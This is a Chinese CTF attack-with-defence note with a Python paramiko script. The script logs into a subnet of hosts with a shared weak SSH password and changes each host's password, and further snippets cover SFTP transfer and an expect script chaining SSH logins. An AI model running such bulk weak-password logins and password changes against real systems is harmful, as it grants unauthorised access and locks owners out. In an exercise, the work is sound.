ctf之AWD(1) ssh弱口令
批量修改ssh初始密碼
要點
passwd的--stdin參數ubuntu不支持,chpasswd命令需要root權限
echo "root" |passwd --stdin apache
- 更改密碼用 `sh -c passwd` 命令,不直接用 passwd
- 控制初始登錄ssh的歡迎banner
- 控制收發包速度和 CRLF,通過 jupyter 快速調試
- git paramiko 源碼,查看 example 和 doc
git clone https://github.com/paramiko/paramiko.git
pexpect 庫的 pexpect.spawn 在 Windows 不可用
Python自動化運維:技術與最佳實踐:
https://github.com/sv4us/ebook/tree/master/python
python3 script
# -*- coding:utf-8 -*-
import paramiko
import time
import queue
'''
passwd的--stdin參數ubuntu不支持
chpasswd
joe:abcdef
echo "root" |passwd --stdin apache
'''
# ANSI escape prefixes for console output. Nothing in this file emits a reset
# sequence, so the colour stays active after each message.
COLOR_GREEN = '\033[1;32;40m'
COLOR_RED = '\033[1;31;40m'

# Candidate account names; the functions below log in as USER[1].
USER = ['root', 'apache', 'root1', 'ctf', 'student']

# Initial (weak) SSH password the hosts are assumed to ship with.
PASSWORD_SSH = '123456'

# Replacement password.
# SECURITY NOTE: this value is hard-coded and identical for every host, so
# anyone who can read the script knows the "new" secret. Supply it at run
# time and keep it out of source control when using this outside a throwaway
# lab.
PASSWORD_NEW = 'aser1234..'
def get_ip(ip1, ip2):
    """Return a FIFO queue of addresses inside the 192.168.232.x range.

    Args:
        ip1: First value of the last octet (anything ``int`` accepts).
        ip2: End of the range; it is exclusive, so ``get_ip(141, 142)``
            yields only ``192.168.232.141``.

    Returns:
        A ``queue.Queue`` holding one address string per host, in ascending
        order.
    """
    pending = queue.Queue()
    last_octets = range(int(ip1), int(ip2))
    for octet in last_octets:
        pending.put('192.168.232.' + str(octet))
    return pending
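def write_ip(lfile, data):
    """Append ``data`` plus the current local time as one line of ``lfile``.

    The file serves as a record of the hosts that were processed. Failures
    are reported on the console and never raised, so a logging problem does
    not interrupt the run.

    Args:
        lfile: Path of the log file.
        data: Text to record (the callers pass the host address).
    """
    try:
        # Append instead of 'w+': truncating on every call kept only the last
        # host of a run. The context manager also closes the handle when the
        # write itself fails.
        with open(lfile, 'a') as f:
            f.write(data + ' ' + time.ctime() + '\n')
    except Exception as e:
        print(COLOR_RED + '[-]:寫入失敗' + str(e))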
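def ssh_exec(ip, port):
    """Log in to one host with the initial credentials and run a probe command.

    Connects as ``USER[1]`` with ``PASSWORD_SSH`` and runs ``curl ip.sb``.
    When the command prints anything on stdout, that output is echoed and the
    host is recorded through ``write_ip``. A rejected login is reported and
    swallowed; every other exception propagates to the caller.

    Args:
        ip: Host address to connect to (converted with ``str``).
        port: TCP port of the SSH service.
    """
    ssh = paramiko.SSHClient()
    # SECURITY NOTE: AutoAddPolicy accepts whatever host key the server
    # presents, so the password can be handed to a host impersonating the
    # target. Tolerable only on an isolated exercise network; elsewhere load
    # known host keys and reject unknown ones.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=str(ip), port=port, username=USER[1], password=PASSWORD_SSH)
        command1 = 'curl ip.sb'
        # Alternative left by the author. It places the new password on a
        # shell command line (visible in process listings and interpreted by
        # the shell), and `passwd --stdin` is not available on Ubuntu.
        #command1 = 'echo %s|passwd --stdin %s' % (PASSWORD_NEW, USER[0])
        _stdin, stdout, stderr = ssh.exec_command(command1)
        # Both streams are read; only stdout decides success.
        out, _err = stdout.read(), stderr.read()
        if out:
            print(COLOR_GREEN + '[+]:' + str(ip) + '\n' + out.decode('utf-8').strip())
            write_ip('d:/ssh_ip.txt', str(ip))
        else:
            print(COLOR_RED + '[-]: 命令執行失敗')
    except paramiko.ssh_exception.AuthenticationException:
        print(COLOR_RED + '[-]:' + str(ip) + '賬號密碼錯誤!')
    finally:
        # Always release the transport; the original never closed the client.
        ssh.close()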
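def ssh_invoke_shell(ip, port):
    """Change the login password on one host through an interactive shell.

    Connects as ``USER[1]`` with ``PASSWORD_SSH``, starts ``sh -c passwd`` and
    answers its prompts with the current password followed by ``PASSWORD_NEW``
    twice. The passwords are typed into the prompt, so they never appear on a
    command line. A rejected login is reported and swallowed; every other
    exception propagates to the caller.

    Args:
        ip: Host address to connect to.
        port: TCP port of the SSH service.
    """
    ssh = paramiko.SSHClient()
    # SECURITY NOTE: AutoAddPolicy accepts whatever host key the server
    # presents, so both the old and the new password can be handed to a host
    # impersonating the target. Tolerable only on an isolated exercise
    # network; elsewhere load known host keys and reject unknown ones.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=ip, port=port, username=USER[1], password=PASSWORD_SSH)
        interact = ssh.invoke_shell()
        interact.settimeout(10)

        def send_recv(data):
            """Send one line, wait briefly, then print whatever has arrived."""
            interact.send(data)
            # Fixed pause: a slow host may not have answered yet, in which
            # case 'recv failed' is printed and the dialogue goes on anyway.
            time.sleep(0.5)
            if interact.recv_ready():
                print(interact.recv(1024).decode('utf-8'))
            else:
                print('recv failed')

        send_recv('sh -c passwd\r')
        send_recv(PASSWORD_SSH + '\r')
        send_recv(PASSWORD_NEW + '\r')
        send_recv(PASSWORD_NEW + '\r')
        # NOTE(review): the host is recorded without checking passwd's reply,
        # so the log can list hosts whose password was not actually changed.
        write_ip('d:/ssh_ip.txt', str(ip))
        interact.shutdown(2)  # 0: stop receiving, 1: stop sending, 2: stop both
        if interact.exit_status_ready():
            print("EXIT :", interact.recv_exit_status())
    except paramiko.ssh_exception.AuthenticationException:
        print('[-]:' + '賬號密碼錯誤!')
    finally:
        # Always release the transport; the original never closed the client.
        ssh.close()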
def change_ssh(ip1, ip2):
    """Run the password change against every address that ``get_ip`` returns.

    Hosts are handled one after another. Any exception raised for a host is
    printed and the loop moves on to the next one.

    Args:
        ip1: First value of the last octet.
        ip2: End of the range, passed unchanged to ``get_ip``.
    """
    hosts = get_ip(ip1, ip2)
    while not hosts.empty():
        try:
            target = hosts.get_nowait()
            # Probe-only variant, left disabled by the author:
            #ssh_exec(target, 22)
            ssh_invoke_shell(target, 22)
        except Exception as exc:
            # Best effort by design: one unreachable host must not end the run.
            print(COLOR_RED + '[-]:' + 'error' + str(exc))
if __name__ == '__main__':
    # Earlier range, left disabled by the author:
    #change_ssh(129, 130)
    # get_ip treats the second bound as exclusive, so this run covers a
    # single host, 192.168.232.141.
    change_ssh(141, 142)
'''
#sftp
transport = paramiko.Transport(('192.168.1.111',22))
transport.connect(username='root', password='123456')
sftp = paramiko.SFTPClient.from_transport(transport)
# 將/tmp/test.txt 上傳至服務器 /data/test.txt
sftp.put('/tmp/test.txt', '/data/test.txt')
# 將/data/test.txt 下載到本地 /tmp/a.txt
sftp.get('/data/test.txt', '/tmp/a.txt')
transport.close()
'''
##基於公鑰密鑰上傳下載
'''
private_key = paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa')
transport = paramiko.Transport(('10.0.3.56', 22))
transport.connect(username='root', pkey=private_key)
sftp = paramiko.SFTPClient.from_transport(transport)
# 將/tmp/haha.txt 上傳至服務器 /tmp/a.txt
sftp.put('/tmp/haha.txt', '/tmp/a.txt')
# 將/tmp/a.txt 下載到本地 /root/a.txt
sftp.get('/tmp/a.txt', '/root/a.txt')
transport.close()
'''
'''
###自動ssh/scp腳本
如果需要從A,到B,然後才能夠到C,那麼需要ssh和scp兩次,是比較麻煩的。
ssh自動登錄:
#!/usr/bin/expect -f
set timeout -1
spawn ssh root@B
expect "password:"
send "pppppp\r"
expect "]*"
send "ssh root@C\r"
expect "password:"
send "pppppp\r"
interact
'''